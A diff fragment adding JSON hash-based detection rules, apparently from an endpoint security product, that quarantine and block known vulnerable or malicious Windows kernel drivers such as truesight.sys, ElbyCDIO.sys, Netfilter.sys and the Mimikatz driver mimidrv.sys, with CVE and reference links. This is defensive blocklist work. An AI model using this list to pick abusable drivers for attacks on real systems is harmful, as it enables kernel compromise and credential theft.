+ "hl_testing_start_time": "2026-03-23T11:45:29.613126Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f85784fa8e7a7ec86cb3fe76435802f6bb82256e1824ed7b5d61bf075f054573",
+ "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8adc5bf7-282f-581a-b1ec-7622aac46407",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815366Z",
+ "creation_date": "2026-03-23T11:45:31.815368Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815374Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cac2b6e639f3ab5b42d228b161029c913284e7f41125783a96b2d6a71be507e2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8adda29f-0bf5-5939-92b2-555af963cbce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815960Z",
+ "creation_date": "2026-03-23T11:45:31.815964Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815970Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d58d5b56dcfd39a9970384520386a56e2a0a4fdbbccfb6706cebffabe97ac54",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ade8aa3-d152-5bac-8bbc-a4f4c31bdb99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483095Z",
+ "creation_date": "2026-03-23T11:45:31.483099Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483109Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e57d77d3948703c9efba0b62151548cae781a708c517e20060a48caa3960a354",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ae8a1c5-18ab-5be0-8b68-729a5eb2802e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815160Z",
+ "creation_date": "2026-03-23T11:45:31.815162Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815167Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c5fe73351a6765fef5d095693d15ddebb13d95de901843a03f5596adc7a00656",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ae9baf4-1c06-5888-87d0-803c7688728f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151055Z",
+ "creation_date": "2026-03-23T11:45:31.151057Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151063Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "648f2aa5ed1671df0af786521e15619d0979753752197df4c79f83af69a4b1d2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8aea0465-7cf9-5b4d-9e65-45b03e11a403",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973006Z",
+ "creation_date": "2026-03-23T11:45:29.973008Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973014Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f68ca89910ebe9da3d02ec82d935de1814d79c44f36cd30ea02fa49ae488f00",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8aee5b3f-8622-54fb-9e42-a03520ef8a83",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452678Z",
+ "creation_date": "2026-03-23T11:45:30.452682Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452691Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18b12a09448244180344d7e5f8028a0ca53ca0f3bddfec06d00f995619c3fc0b",
+ "comment": "Vulnerable Kernel Driver (aka mapmom.sys) [https://www.loldrivers.io/drivers/cf94939a-703f-46a4-917b-d6af7e0685ef/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8af6982c-bdc1-5b6d-b390-9fd558675d7e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822007Z",
+ "creation_date": "2026-03-23T11:45:31.822010Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822018Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ea0e67e8e4b6b5f5b56205dcb965e6fa99515ac03063ba8313078d8183a40f7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8af73424-cabd-5273-b142-1734b1585b28",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494196Z",
+ "creation_date": "2026-03-23T11:45:31.494199Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494207Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2143ad726c1d98f46dd3fa848294ce5e5c5c1ebb4414762c13b0e427f9d6d42",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8b0d4dcd-a24f-510e-85ef-1401806f03dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614596Z",
+ "creation_date": "2026-03-23T11:45:29.614598Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614604Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "591bd5e92dfa0117b3daa29750e73e2db25baa717c31217539d30ffb1f7f3a52",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8b1c0132-0f87-53b9-a3e9-598681d12184",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828707Z",
+ "creation_date": "2026-03-23T11:45:31.828709Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828714Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": 
"2463da4c24ab4e8beee552c24f2a70316aa2cb8c3ec148ce446b3a11a8b08956", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8b24d52f-c3b6-563a-b568-b415e288987f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820244Z", + "creation_date": "2026-03-23T11:45:31.820247Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820256Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34580b7c46cf2ba86ec120aa94c5c6a74347eb8e214165b2d0bcc4f51a310ebd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8b2e4de4-b4f1-5688-b0c0-14e7e1bd315d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825511Z", + "creation_date": "2026-03-23T11:45:31.825513Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825519Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e03e2302933fce5d5e302bce826ff8ed6f1d3d57363f611a3855b1f18121431", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8b354715-a8d4-50dd-b4fd-7387f41976e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467919Z", + "creation_date": "2026-03-23T11:45:30.467922Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467930Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c005f1bcb549d76ab86390217ad6b3a2226ec74fd6f4595c0fd28b73102b1b99", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8b40143f-a5f1-5480-9a6f-a3dc8de0f0ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972908Z", + "creation_date": "2026-03-23T11:45:29.972910Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972915Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "238046cfe126a1f8ab96d8b62f6aa5ec97bab830e2bae5b1b6ab2d31894c79e4", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8b4b0dba-3bf6-5928-9271-9e40c906fa85", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613787Z", + "creation_date": "2026-03-23T11:45:29.613789Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613794Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6dafd15ee2fbce87fef1279312660fc399c4168f55b6e6d463bf680f1979adcf", + "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8b5f7cbd-f507-5415-9529-20310e67627f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454919Z", + "creation_date": "2026-03-23T11:45:30.454922Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454930Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "22da5a055b7b17c69def9f5af54e257c751507e7b6b9a835fcf6245ab90ae750", + "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"8b68cf26-de42-5958-a6f6-89188fe44e69", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812907Z", + "creation_date": "2026-03-23T11:45:31.812909Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812915Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9700d4a0ec9ab9aebd902664586c608ea41255f181fdd60e4e4f97faff4c8efc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8b6b55f3-9d75-50a2-883f-a4f7c2a6cfcb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622828Z", + "creation_date": "2026-03-23T11:45:29.622830Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.622835Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "507cee84e2924e81916c8bf090efb1beab3c258a79e1e1bf3637b8b7824d0a86", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8b8f1810-a120-5dc7-aca8-7320c2d51160", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605487Z", + "creation_date": "2026-03-23T11:45:29.605489Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605494Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "98a123b314cba2de65f899cdbfa386532f178333389e0f0fbd544aff85be02eb", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8bb42c60-1d10-5ad3-aa54-9eb7d3d53dda", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486010Z", + "creation_date": "2026-03-23T11:45:31.486013Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486023Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8d0c87a31a5e5c22ccd722f80165f98023b8ffa270a03ee174728e8e247d05b6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8bb87c0e-a975-5774-a6ac-6e726a11efd0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492250Z", + "creation_date": "2026-03-23T11:45:31.492252Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492257Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "b266100dc2c0a9c657e443e0123842404478d170e113f81fe18a5b0e9f915735", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8bbbfa75-1155-5e2d-b741-079d4914edc9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470341Z", + "creation_date": "2026-03-23T11:45:30.470345Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470354Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 